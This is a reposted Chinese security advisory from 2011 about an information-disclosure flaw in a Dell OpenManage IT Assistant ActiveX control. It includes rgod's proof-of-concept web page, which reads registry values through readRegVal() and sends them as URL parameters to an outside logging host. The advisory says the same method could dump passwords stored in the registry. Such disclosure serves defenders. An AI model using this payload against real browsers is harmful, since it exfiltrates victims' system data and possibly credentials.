首页 / 操作系统 / Linux / Dell OpenManage IT Assistant “detectIESettingsForITA.OCX”信息泄露漏洞
发布日期:2011-07-14 更新日期:2011-07-14受影响系统: Dell Dell OpenManage IT Assistant 8.9.0 描述: -------------------------------------------------------------------------------- BUGTRAQ ID: 48680Dell OpenManage IT Assistant可以查找和提高各种Dell系统的摘要状态,包括客户机系统混合、服务器、具有远程访问卡的系统,Dell PowerConnect交换机,以及与机架密集型系统配合使用的数字键盘/视频/鼠标交换机。Dell OpenManage IT Assistant在detectIESettingsForITA.OCX的实现上存在漏洞,远程攻击者可利用此漏洞获取泄露的敏感信息。此漏洞源于detectIESettingsForITA ActiveX控件中的不安全"readRegVal()"方法,可允许查询注册码/注册值对,泄露任意注册表数据。<*来源:rgod (rgod@autistici.org)
链接:http://retrogod.altervista.org/9sg_dell_activex.html *>测试方法: --------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!rgod (rgod@autistici.org)提供了如下测试方法:<!-- Dell IT Assistant detectIESettingsForITA.ocx ActiveX Control readRegVal() Remote Registry Dump Vulnerabilitydownload uri: ftp://ftp.us.dell.com/sysman/OM-ITAssistant-Dell-Web-WIN-6.5.0-2247_A01.21.exeActiveX settings:CLSID: {6286EF1A-B56E-48EF-90C3-743410657F3C} ProgID: DETECTIESETTINGS.detectIESettingsCtrl.1 Binary path: C:WINDOWSDOWNLO~1DETECT~1.OCX File Version: 8.1.0.0 Safe for Scripting (Registry): TRUE Safe for Initialization: TRUEThe readRegVal() method allows to dump specific values from the Windows registry. Frome the typelib:... /* DISPID=1 */ /* VT_BSTR [8] */ function readRegVal( /* VT_BSTR [8] */ $root, /* VT_BSTR [8] */ $key, /* VT_BSTR [8] */ $tag ) { /* method readRegVal */ } ...Instead of searching inside a specific hive, this control asks to specify a root key. In my experience, lots of application stores encrypted or even clear text passwords inside the registry, so an attacker can abuse this to gain certain credentials from the victim browser. If you ask me, this is not acceptable.This sample code extracts BIOS informations and redirects to a specified url with this info passed as parameters. Through some more programming efforts, you could dump a bigger portion of the registry. rgod --> <html> <object classid="clsid:6286EF1A-B56E-48EF-90C3-743410657F3C" id="obj" /> </object> <script>x = obj.readRegVal("HKLM","HARDWARE\DESCRIPTION\System\BIOS","BaseBoardManufacturer"); document.write(x + "<BR>");url="http://www.sdfsdsdfsdfsffsdf.com/log.php?BM=" + escape(x);x = obj.readRegVal("HKLM","HARDWARE\DESCRIPTION\System\BIOS","BaseBoardProduct"); document.write(x + "<BR>");url+= "&BP=" + escape(x);x = obj.readRegVal("HKLM","HARDWARE\DESCRIPTION\System\BIOS","BaseBoardVersion"); document.write(x + "<BR>");url+= "&BV=" + escape(x);x = obj.readRegVal("HKLM","HARDWARE\DESCRIPTION\System\BIOS","BIOSVendor"); document.write(x + "<BR>");url+= "&BIOSV=" + escape(x);x = obj.readRegVal("HKLM","HARDWARE\DESCRIPTION\System\BIOS","BIOSVersion"); document.write(x + "<BR>");url+= "&BIOSVE=" + escape(x);x = obj.readRegVal("HKLM","HARDWARE\DESCRIPTION\System\BIOS","SystemManufacturer"); document.write(x + "<BR>");url+= "&SM=" + escape(x);x = obj.readRegVal("HKLM","HARDWARE\DESCRIPTION\System\BIOS","SystemProductName"); document.write(x + "<BR>");url+= "&SP=" + escape(x);x = obj.readRegVal("HKLM","HARDWARE\DESCRIPTION\System\BIOS","SystemVersion"); document.write(x + "<BR>");url+= "&SV=" + escape(x);document.location= url; </script>建议: -------------------------------------------------------------------------------- 厂商补丁:Dell ---- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://dell.com/Citrix Access Gateway Plug-in for Windows ActiveX控件代码执行漏洞Apache Tomcat sendfile请求安全限制绕过和拒绝服务漏洞相关资讯 漏洞
快递官网漏洞泄露 1400 万用户信息 (08/12/2014 08:37:42)
要389目录服务器访问绕过漏洞 (10/01/2012 09:18:08)
ASUS Net4Switch "ipswcom.dll" (03/02/2012 09:32:42)
软件漏洞是一笔大买卖! (10/06/2012 08:28:32)
PHPCMS V9.1.13任意文件包含漏洞分 (08/01/2012 07:23:17)
Open Handset Alliance Android (03/01/2012 06:59:34)
易网时代-编程资源站